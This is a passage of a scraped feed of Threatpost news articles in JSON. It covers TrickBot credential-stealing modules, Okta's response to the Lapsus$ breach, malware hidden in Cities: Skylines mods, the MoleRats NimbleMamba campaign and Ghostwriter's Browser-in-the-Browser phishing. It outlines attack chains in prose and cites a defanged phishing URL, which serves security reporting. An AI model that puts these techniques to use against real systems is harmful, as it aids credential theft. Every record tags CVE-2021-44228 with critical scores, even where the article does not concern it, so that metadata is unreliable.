deobfuscators like de4js, and so on,\u201d they explained. \u201cAfter we applied these tools, we noticed that although the code became more readable, it also stopped working.\u201d\n\nAnother anti-analysis technique they observed involved researchers sending automated requests to the C2 to get fresh web-injects: \u201cIf there is no \u2018Referer\u2019 header in the request, the server will not answer with a valid web-inject,\u201d according to CPR.\n\n\u201cWe not only see variants created based on more recently successful malware, but we even see threat actors use malware that is even twenty years old to generate new variants,\u201d Saryu Nayyar, CEO and founder at Gurucul, said of the Zeus connection, via email. \u201cAs can be seen by TrickBot, even when a threat actor group is broken up, their legacy lives on to as other groups can inherent their tools, tactics and procedures with their own modifications and improvements to evade current detection techniques.\u201d\n\n### **TrickBot\u2019s \u2018tabDLL\u2019 Module**\n\nThe second new development is a dynamic link library (DLL), also used to grab user credentials. Its ultimate goal is to spread the malware via network shares, researchers noted.\n\ntabDLL uses a multi-step process, as CPR laid out. In sequence, the module does the following:\n\n 1. Enable the storing of user credential information in the LSASS application;\n 2. Inject the \u201cLocker\u201d module into the legitimate explorer.exe application;\n 3. From the infected explorer.exe, force the user to enter login credentials to the application, then lock the user\u2019s session;\n 4. Store the credentials in the LSASS application memory;\n 5. Grab the credentials from the LSASS application memory using [Mimikatz](<https://www.varonis.com/blog/what-is-mimikatz>), which is an open-source tool for extracting data from an application\u2019s memory;\n 6. Report credentials to the C2;\n 7. And, use the [EternalRomance exploit](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>) to spread to other targets inside the network via SMBv1 network shares.\n\n### **TrickBot\u2019s \u2018pwgrabc\u2019 Module**\n\nThe pwgrabc module, as its name suggests, is a catch-all credential stealer for various applications.\n\nThe targeted applications are as follows: AnyConnect; Chrome; ChromeBeta; Edge; EdgeBeta; Filezilla; Firefox; Git; Internet Explorer; KeePass; OpenSSH; OpenVPN; Outlook; Precious; Putty; RDCMan; RDP; TeamViewer; VNC; and WinSCP.\n\nOverall, the campaign is a nice mix of skills, the researchers concluded.\n\n\u201cBased on our technical analysis, we can see that TrickBot authors have the skills to approach the malware development from a very low level and pay attention to small details,\u201d they said. \u201cMeanwhile\u2026we know that the operators behind the infrastructure are very experienced with malware development on a high level as well. TrickBot remains a dangerous threat.\u201d\n\n_**Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T22:34:52", "type": "threatpost", "title": "TrickBot Ravages Customers of Amazon, PayPal and Other Top Brands", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T22:34:52", "id": "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "href": "https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-28T18:36:10", "description": "On Friday, Okta \u2013 the authentication firm-cum-Lapsus$-victim \u2013 admitted that it \u201cmade a mistake\u201d in handling the [recently revealed](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>) Lapsus$ attack. \n\nThe mistake: trusting that a service provider had told Okta everything it needed to know about an \u201cunsuccessful\u201d account takeover (ATO) at one of its service providers and that the attackers wouldn\u2019t reach their tentacles back to drag in Okta or its customers. \n\nWrong-o, it turned out: About a week ago, Lapsus$ bragged about having gotten itself \u201csuperuser/admin\u201d access to Okta\u2019s internal systems, gleefully posting proof and poking fun at Okta for its denials that the Jan. 20 attack had been successful. \n\nIn an[ FAQ](<https://support.okta.com/help/s/article/Frequently-Asked-Questions-Regarding-January-2022-Compromise?language=en_US>) published on Friday, Okta offered a full timeline of the incident, which started on Jan. 20 when the company learned that \u201ca new factor was added to a Sitel customer support engineer\u2019s Okta account.\u201d\n\n## What Happened at Sitel \n\nThe target of the Jan. 20 attack was Sykes Enterprises, which Sitel acquired in September 2021. Okta has referred to the company as Sitel \u2013 a third-party vendor that helps Okta out on the customer-support front \u2013 in its updates and FAQ. \n\nThe threat actor failed in its attempt to add a new factor \u2013 a password \u2013 to one of Sitel\u2019s customer support engineer\u2019s Okta account. Okta Security had received an alert that a new factor was added to a Sitel employee\u2019s Okta account from a new location and that the target didn\u2019t accept a multifactor authentication (MFA) challenge, which Okta said blocked the intruder\u2019s access to the Okta account. \n\nNonetheless, \u201cout of an abundance of caution,\u201d the next day \u2013 Jan. 21 \u2013 Okta reset the account and notified Sitel. On the same day, Okta Security shared indicators of compromise (IOC) with Sitel, which told Okta that it had retained outside support from \u201ca leading forensic firm.\u201d\n\nAccording to the full report that Sitel commissioned, the threat actor had access to Sitel\u2019s systems for a five-day window, from Jan. 16-21: dates that back up the screenshots that Lapsus$ posted on March 21. \n\nDuring the five-day window wherein it had access to Sitel, the attacker\u2019s only action was the attempted password reset.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/28140124/Screen-Shot-2022-03-28-at-1.59.44-PM-1-e1648490538671.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/28140124/Screen-Shot-2022-03-28-at-1.59.44-PM-1-e1648490538671.png>)\n\nTimeline of Okta hack. Source: Okta.\n\n## How Okta Screwed Up\n\nAs far as why Okta didn\u2019t notify customers when it learned of the ATO attack in January, it acknowledged on Friday that \u201cwe made a mistake.\u201d \n\n\u201cSitel is our service provider for which we are ultimately responsible,\u201d it admitted in the Friday FAQ. \n\nYou can\u2019t know what you don\u2019t know, though: \u201cIn January, we did not know the extent of the Sitel issue \u2013 only that we detected and prevented an account takeover attempt and that Sitel had retained a third party forensic firm to investigate,\u201d Okta said. \u201cAt that time, we didn\u2019t recognize that there was a risk to Okta and our customers. We should have more actively and forcefully compelled information from Sitel.\u201d\n\nCoulda, woulda, should, it said: \u201cIn light of the evidence that we have gathered in the last week, it is clear that we would have made a different decision if we had been in possession of all of the facts that we have today.\u201d\n\nIt must be a painful mea culpa: Okta\u2019s share price had dropped nearly15 percent as of Friday. As the Wall Street Journal [reported](<https://www.wsj.com/articles/okta-faces-long-road-back-11648211400>), that\u2019s a common reaction after major cyber attacks, such as those at SolarWinds, Mimecast and Mandiant, all of which saw shares slide after they reported their own incidents. \n\nThe WSJ\u2019s headlines say it all: \u201cIdentity-management company has strong market position, but business impact of recent hack won\u2019t be clear for a while,\u201d the business daily said on Friday, predicting that \u201d Okta Faces Long Road Back.\u201d \n\n## Potential Extent of Compromise\n\nIn its Friday FAQ, Okta said that, as detailed in[ its blog](<https://www.okta.com/blog/2022/03/oktas-investigation-of-the-january-2022-compromise/>), the company has already identified and contacted 366 potentially affected customers. Okta service itself was not breached, it said: \u201cThere is no impact to Auth0 or AtSpoke customers, and there is no impact to HIPAA and FedRAMP customers.\u201d\n\nAs such, customers don\u2019t have to reset passwords, Okta said: \u201cWe are confident in our conclusions that the Okta service has not been breached and there are no corrective actions that need to be taken by our customers.\n\n\u201cWe are confident in this conclusion because Sitel (and therefore the threat actor who only had the access that Sitel had) was unable to create or delete users, or download customer databases.\u201d\n\nThat lack of access is by design, Okta explained. \u201cIn assessing the potential extent of the compromise, it is important to remember that by design, Sitel\u2019s support engineers have limited access. They are unable to create or delete users, or download customer databases. Support engineers are able to facilitate the resetting of passwords and multi-factor authentication factors for users, but are unable to choose those passwords. In other words, an individual with this level of access could repeatedly trigger a password reset for users, but would not be able to log in to the service.\u201d\n\nBesides its attack on Okta, the precocious Lapsus$ gang \u2013 a group of data extortionists potentially [thinned out](<https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/>) by London police having collared seven suspected members last week \u2013 also posted some of Microsoft\u2019s source code and data about internal projects and systems around the same time as it shared Okta screenshots.\n\n## How Much Should We Blame Okta?\n\nSecurity specialists aren\u2019t jumping to blame Okta for its admitted \u201cmistake.\u201d The thinking: There but for the grace of God go us. \n\nAfter all, ATOs are common. How should an organization know which ones to consider as worthy of close inspection, and when should they follow up with a deeper dive to ensure the attempt wasn\u2019t successful? \n\nSounil Yu, chief information security officer at JupiterOne \u2013 provider of cyber asset management and governance technology \u2013 told Threatpost on Monday that these intrusions (or, rather, attempted intrusions, as the case may be) occur regularly, but the \u201cvast majority\u201d are beaten back before they have a serious impact or lead to further incidents.\n\n\u201cIt\u2019s easy in hindsight to understand the true severity of an incident, but hard in the present time,\u201d he said via email. \n\nChris Morgan, senior cyber threat intelligence analyst at digital risk protection firm Digital Shadows, explained that ATOs are \u201cincredibly common\u201d due to a combination of the effectiveness and availability of brute-force cracking tools and threat actors\u2019 ability to sell stolen accounts on cybercriminal forums. \n\n## What Should Trigger a Report?\n\nThe question of whether certain incidents are material enough to report \u201ccan be more art than science,\u201d Yu said. But the Okta case will probably cause many organizations to reconsider what ratings and thresholds they\u2019re applying to such incidents, he surmised, \u201cso that we are not seen as negligent in meeting our reporting obligations.\u201d\n\nKnowing when to conduct a more robust investigation depends on what facts are uncovered during the incident management process, along with the risk associated with the targeted account, Morgan said via email. \u201cAn account with significant privileges should be treated with a higher priority than those that [have] limited functionality,\u201d he advised.\n\nInitial triage of ATO attacks aim to identify key facts over what activity the account has been involved in, to accurately determine the risk and next steps, Morgan said. \u201cThis is typically done by checking authentication logs and observing login activity and includes spotting whether the account has attempted to login to additional services, changed any passwords, or downloaded external material.\u201d he continued. \u201cIt also includes activity that may have an impact on the overall risk, like whether the account has accessed sensitive data or attempted to establish persistence.\u201d\n\n## No \u2018God-like Access\u201d Was Gained\n\nWhen the Okta breach first came to light, there was concern about a \u201csuperuser\u201d app pictured in Lapsus$ screenshots. Okta clarified on Friday that this was no \u201cSuper Admin\u201d account, as had been feared initially. Rather, it\u2019s an in-house application \u2013 known as SuperUser or SU \u2013 used by support staff to handle most queries. \n\n\u201cThis does not provide \u201cgod-like access\u201d to all its users,\u201d Okta Chief Security Officer David Bradbury explained. \u201cThis is an application built with least privilege in mind to ensure that support engineers are granted only the specific access they require to perform their roles.\u201d\n\nSpecifically, SuperUser engineers can\u2019t create or delete users or download customer databases. \n\nWhat SuperUsers can do: \u201cSupport engineers do have access to limited data \u2013 for example, Jira tickets and lists of users \u2013 that were seen in the screenshots,\u201d Bradbury clarified. \u201cSupport engineers are also able to facilitate the resetting of passwords and MFA factors for users, but are unable to obtain those passwords.\u201d\n\nThe fact that the Sitel account Lapsus$ took over was reportedly built with the principle of least privilege in mind \u201cshould have minimized the data and services that Lapsus$ were able to view,\u201d Morgan said, in response to Threatpost asking what Okta did right. \n\n\u201cOkta should also be praised for how quickly they identified and worked to lock down the compromised account,\u201d he added. \n\nHowever, clearly, that timeliness didn\u2019t extend to the forensic reporting and communication of the incident, as Okta itself has now admitted. \n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T18:28:34", "type": "threatpost", "title": "Okta Says It Goofed in Handling the Lapsus$ Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-28T18:28:34", "id": "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "href": "https://threatpost.com/okta-goofed-lapsus-attack/179129/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-14T17:51:33", "description": "The developer of several popular mods for the Cities: Skylines city-building game has been banned after malware was discovered hidden in their wares.\n\nThe modder, who goes by the handle Chaos as well as Holy Water, reportedly tucked an automatic updater into several mods that enabled the author to deliver malware to anybody who downloaded them.\n\nIt started last year, when Chaos launched a \u201credesigned\u201d version of Harmony: a core framework project that most Cities: Skylines mods rely on to work. The author went on to similarly rework other popular mods, and he listed his Harmony redo as a core download: in other words, players would be forced to download it to get dependent mods to work.\n\nBut an automatic updater was subsequently discovered, hidden away in Chao\u2019s Harmony version \u2013 an updater that enabled the modder to deliver malware to the devices of those who downloaded it. As well, the author reportedly poisoned other mods with malicious code that bogged down game-play, forcing players to download yet more tainted mods that Chaos had created as \u201csolutions.\u201d\n\nAccording to a pinned post on the [Cities: Skylines subreddit](<https://old.reddit.com/r/CitiesSkylines/>), some, but not all, of Chaos\u2019 mods have been removed from the Steam Workshop, and the author\u2019s accounts have been suspended.\n\n## Players Urged to Trash the Mods\n\nThe subreddit moderator who posted the warning on Saturday \u2013 kjmci \u2013 urged players to scrub their systems of anything published by Chaos.\n\n\u201cWe recommend in the strongest possible terms that you unsubscribe from all items published by this author and do not subscribe, download, or install any mods, from any source, that may be published by this individual in future,\u201d according to the subreddit post.\n\n[Valve](<https://www.nme.com/brands/valve>) has reportedly yanked several of the mods that feed into the automatic updater and has banned Chaos\u2019 most recent accounts. However, as [NME](<https://www.nme.com/news/gaming-news/valve-bans-cities-skylines-modder-after-discovery-of-major-malware-risk-3159709>) reports, the modder\u2019s downloads now number around 35,000, meaning that the devices of tens of thousands of gamers have potentially been infected.\n\nChaos had developed several forks \u2013 i.e., modified and reuploaded versions \u2013 of popular mods from well-known creators, including Harmony, Network Extensions and Traffic Manager: President Edition.\n\n## Poisoning the Code Chain\n\nLacing Harmony with malware is particularly pernicious, given that it\u2019s one of the mods that Chaos \u201credesigned.\u201d Chaos listed the modified version as a core download, as in, a dependency for other mods that players would have to download in order for other dependent mods to work.\n\nAmong other functions, Harmony dishes out a patching library to mods that need it and hot-patches older Harmony versions \u2013 older versions that, according to Steam\u2019s [community page](<https://steamcommunity.com/workshop/filedetails/?id=2040656402>), are still in use by various mods.\n\n\u201cUsers install Harmony (redesigned) for a particular reason, suddenly they get errors in popular mods. The solution provided is to use [Chaos\u2019] versions,\u201d kjmci told NME. \u201cThose versions gain traction and users, and people come across them instead of the originals\u2026 and see Harmony (redesigned) marked as a dependency. Users install Harmony (redesigned) with the [automatic updating code] bundled with it. Suddenly you have tens of thousands of users who have effectively installed a trojan on their computer.\u201d\n\nThe automatic, malware-delivering updater was found buried in Chao\u2019s version of Harmony, according to what kjmci told NME. The moderator opts for anonymity because they\u2019ve been targeted by Chaos in the past, they told the publication.\n\n## Some Mods Rigged with Performance-Slaying Malware\n\nBesides inflicting the trojan on unsuspecting players, Chaos also reportedly planted malicious code that targeted fellow modders and employees of the game\u2019s developer, Colossal Order.\n\nThis particular flavor of malware crippled game performance, according to kjmci. The resulting crummy game-play motivated users to download so-called \u201csolutions\u201d that Chaos advertised to help clear up the issues.\n\nFollowing their fans\u2019 complaints about the sluggish performance, the developers of the targeted mods investigated and discovered the malicious code.\n\n## Chaos Could Return\n\nJust because Valve pulled Chaos\u2019 accounts doesn\u2019t mean the modder won\u2019t be back to spread more malware. As NME notes, a loophole in [the workshop rules](<https://wiki.facepunch.com/gmod/Steam_Workshop_Rules>) for Steam \u2013 Valve\u2019s digital distribution service \u2013 could allow the author to keep working on mods from another account even if his current accounts stay banned.\n\nBesides which, just because Chaos was banned doesn\u2019t mean that the damage is done. It could, in fact, get a lot worse, kjmci said: \u201cWhat\u2019s been implemented would let him cryptolock a bunch of machines, create a botnet (and DDoS his enemies?) or mine cryptocurrency.\u201d\n\nDistributed denial-of-service (DDoS) attacks are far from novel in the gaming world. Last month, for example, a massive Minecraft tournament styled after the Netflix blockbuster Squid Game known as \u201cSquidCraft\u201d was attacked with a DDoS attack that [took down](<https://threatpost.com/cyberattacks-squid-game-minecraft-andorra-internet/177981/>) the sole (and state-owned) internet service provider in Andorra.\n\n## \u2018Classic\u2019 Supply Chain Attack\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company Netenrich, noted that malware in games or in game mods \u2013 or even in pirated/cracked games, for that matter, is a fairly common tactic, \u201cone that often involves American and European actors.\u201d\n\nHe told Threatpost on Monday that using a supply chain tactic to get into more victims is \u201ca fairly new tactic,\u201d but unsurprising, given that \u201cour discussion of the potential massive risks of supply chain attacks have inspired new actors to adopt them.\u201d\n\nCasey Bisson, head of product and developer relations at code and security provider BluBracket, told Threatpost on Monday that this is a \u201cclassic software supply chain attack similar to what we\u2019ve seen elsewhere,,\u201d the difference being how close it gets to the consumer end user.\n\n\u201cThere\u2019s lots of open source and commercially sourced software components that go into the apps and games on our mobile devices, but those supply chains are shorter and less complex relative to the components that can go into the software on servers or network devices,\u201d Bisson said via email. \u201cBut \u2018shorter and less complex\u2019 supply chains are still vulnerable.\n\n\u201cCode is a vast and unprotected attack surface, and there\u2019s no class of software that\u2019s immune from attack. The more consumers feel these attacks on their personal mobile devices, the more they\u2019ll demand protections.\u201d\n\nCompanies can get ahead of consumer demands by implementing automated security practices to ensure product safety, he suggested.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-14T17:23:45", "type": "threatpost", "title": "'Cities: Skylines' Gaming Modder Banned Over Hidden Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-14T17:23:45", "id": "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "href": "https://threatpost.com/cities-skylines-modder-banned-over-hidden-malware/178403/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T14:11:09", "description": "Known Palestinian threat actor MoleRats is likely behind a recent malicious email campaign targeting Middle Eastern governments, foreign-policy think tanks and a state-affiliated airline with a new intelligence-gathering trojan dubbed NimbleMamba, researchers said.\n\nResearchers from Proofpoint said they have observed a spear-phishing campaign using multiple vectors since November that they believe is the work of TA402, more [commonly known as](<https://threatpost.com/molerats-apt-espionage-facebook-dropbox/162162/>) MoleRats and linked to the Palestinian Territories, according to a [report](<https://www.proofpoint.com/us/blog/threat-insight/ugg-boots-4-sale-tale-palestinian-aligned-espionage>) posted online Tuesday.\n\nThe campaign uses various phishing lures and includes tactics not only to avoid being detected but also to ensure that its core malware payload only attacks specific targets, Proofpoint researchers wrote in the report. Some of the attacks observed by the team also delivered a secondary payload, a trojan dubbed BrittleBush, they said.\n\nNimbleMamba, delivered as an obfuscated .NET executable using third-party obfuscators, is an intelligence-gathering trojan researchers believe is a replacement for previous malware used by TA402, LastConn.\n\n\u201cNimbleMamba has the traditional capabilities of an intelligence-gathering trojan and is likely designed to be the initial access,\u201d researchers wrote. \u201cFunctionalities include capturing screenshots and obtaining process information from the computer. Additionally, it can detect user interaction, such as looking for mouse movement.\u201d\n\nMoleRats is part of the Gaza Cybergang, an Arabic speaking, politically motivated collective of interrelated threat groups actively targeting the Middle East and North Africa. It\u2019s known for attacks using spyware and other malware aimed at gathering intelligence.\n\nResearchers from Zscaler have already observed MoleRats targeting prominent Palestinians, as well as activists and journalists in Turkey, with spyware [in a previously identified attack](<https://threatpost.com/molerats-apt-spy-bankers-politicians-journalists/177907/>) in January. That campaign used malicious files doctored up to look like legitimate content related to the Israeli-Palestine conflict.\n\n## **Variations of an Espionage Campaign**\n\nProofpoint outlined three types of emails using different tactics and URLs aimed at tricking victims into clicking on malicious links to download the ultimate payloads.\n\nOne, which they observed in November, shows MoleRats pretending to be the Quora website while using an actor-controlled Gmail account with an actor-controlled domain, they said.\n\nThe attack vector demonstrated a hallmark of the campaign, which is to use geofencing to target specific countries with the malicious payload rather than delivering it to everyone who clicks on the email\u2019s malicious link. The email appears to advertise Ugg boots for sale.\n\n\u201cThe malicious URL, such as https[:]//www[.]uggboots4sale[.]com/news15112021.php, in the phishing email was geofenced to the targeted countries,\u201d researchers wrote. \u201d If the target\u2019s IP address fits into the targeted region, the user would be redirected to the .RAR file download containing the latest TA402 implant, NimbleMamba. If outside the target area, the user would be redirected to a legitimate news site.\u201d\n\nThe second variation, called \u201cDropbox URL,\u201d was observed in December using \u201cmultiple phishing pretenses, including clickbait medical lures and ones allegedly sharing confidential geopolitical information,\u201d researchers wrote.\n\nThis variation also used a Gmail account controlled by TA402 to send the email, but shifted to Dropbox URLs to deliver the malicious .RAR files containing NimbleMamba. It also abandoned the use of geofencing, they said.\n\nMoreover, in this variation, researchers noticed that the threat actor also was using the cloud-based file-sharing service Dropbox for malware command and control (C2), which prompted them to notify Dropbox of the malicious activity so they could put an end to it, they said. MoleRats was seen using Dropbox for C2 in its previously identified attacks in January.\n\nThe third email used by attackers, observed in December and January, used socially engineered content specifically to lure targets. However, in this variation, MoleRats \u201cslightly adjusted their attack chain by inserting an additional actor-controlled WordPress URL,\u201d researchers wrote.\n\nThe WordPress site impersonates a news aggregator of the legitimate news site used in the first campaign variation, and likely redirects to the download site of the malicious .RAR files containing NimbleMamba if someone in the targeted region clicks on the link, researchers said.\n\n\u201cIf the source IP address does not align with the target region, the URL will redirect the recipient to a benign website, typically an Arabic-language news website,\u201d they added.\n\n## **NimbleMamba in Depth**\n\nThe most frequently delivered payload of the campaign, NimbleMamba, has some similarities between TA402\u2019s previously used deliverable, LastConn, but also some notable differences, researchers observed.\n\nBoth executables are written in C#, have base64 encoding within the C2 framework and use the Dropbox API for C2 communication. However, there appears to be little code overlap between the two, they said.\n\nNimbleMamba\u2019s use of guardrails to ensure that all infected victims are within TA402\u2019s target region also is unique, as is its use of the Dropbox API for both C2 as well as exfiltration, researchers wrote in the post.\n\n\u201cThe malware also contains multiple capabilities designed to complicate both automated and manual analysis,\u201d they wrote. \u201cBased on this, Proofpoint assesses NimbleMamba is actively being developed, is well-maintained, and designed for use in highly targeted intelligence collection campaigns.\u201d\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T14:03:18", "type": "threatpost", "title": "MoleRats APT Flaunts New Trojan in Latest Cyberespionage Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T14:03:18", "id": "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "href": "https://threatpost.com/molerats-apt-trojan-cyberespionage-campaign/178305/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T18:15:01", "description": "Ghostwriter \u2013 a threat actor previously [linked](<https://www.mandiant.com/resources/unc1151-linked-to-belarus-government>) with the Belarusian Ministry of Defense \u2013 has glommed onto the [recently disclosed](<https://threatpost.com/browser-in-the-browser-attack-makes-phishing-nearly-invisible/179014/>), nearly invisible \u201cBrowser-in-the-Browser\u201d (BitB) credential-phishing technique in order to continue its ongoing [exploitation](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) of the war in Ukraine.\n\nIn a Wednesday [post](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>), Google\u2019s Threat Analysis Group (TAG) said that they\u2019d already spotted BitB being used by multiple government-backed actors prior to the media turning a laser eye on BitB earlier this month. The fresh attention was triggered by a penetration tester and security researcher \u2013 who goes by the handle mr.d0x \u2013 who posted a [description](<https://mrd0x.com/browser-in-the-browser-phishing-attack/?no-cache=1>) of BitB.\n\nGhostwriter actors quickly picked up on BitB, combining it with another of the advanced persistent threat\u2019s (APT\u2019s) phishing techniques: namely, hosting credential-phishing landing pages on compromised sites.\n\n## BitB\n\nThe newly disclosed credential-phishing method of BitB takes advantage of third-party single sign-on ([SSO](<https://en.wikipedia.org/wiki/Single_sign-on>)) options embedded on websites that issue popup windows for authentication, such as \u201cSign in with Google,\u201d Facebook, Apple or Microsoft.\n\nThese days, SSO popups are a routine way to authenticate when you sign in.\n\nBut according to mr.d0x\u2019s post, completely fabricating a malicious version of a popup window is a snap: It\u2019s \u201cquite simple\u201d using basic HTML/CSS, the researcher said a few weeks ago. The concocted popups simulate a browser window within the browser, spoofing a legitimate domain and making it possible to stage convincing phishing attacks.\n\n\u201cCombine the window design with an iframe pointing to the malicious server hosting the phishing page, and [it\u2019s] basically indistinguishable,\u201d mr.d0x wrote at the time.\n\nJavaScript can make the window appear on a link, button click or page loading screen. As well, libraries \u2013 such as the popular JQuery JavaScript library \u2013 can make the window appear visually appealing.\n\n## BitB Credential Phishing on Compromised Sites\n\nIn Wednesday\u2019s post, TAG gave an example, shown below, of how Ghostwriter has taken to hosting credential phishing landing pages on compromised sites:\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/31134025/Ghostwriter_BitB_example-e1648748440308.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/31134025/Ghostwriter_BitB_example-e1648748440308.jpg>)\n\nExample of hosting credential phishing landing pages on compromised sites. Source: TAG.\n\nThe BitB technique shown above entails drawing a login page that appears to be on the passport.i.ua domain, over the page hosted on the compromised site. \u201cOnce a user provides credentials in the dialog, they are posted to an attacker 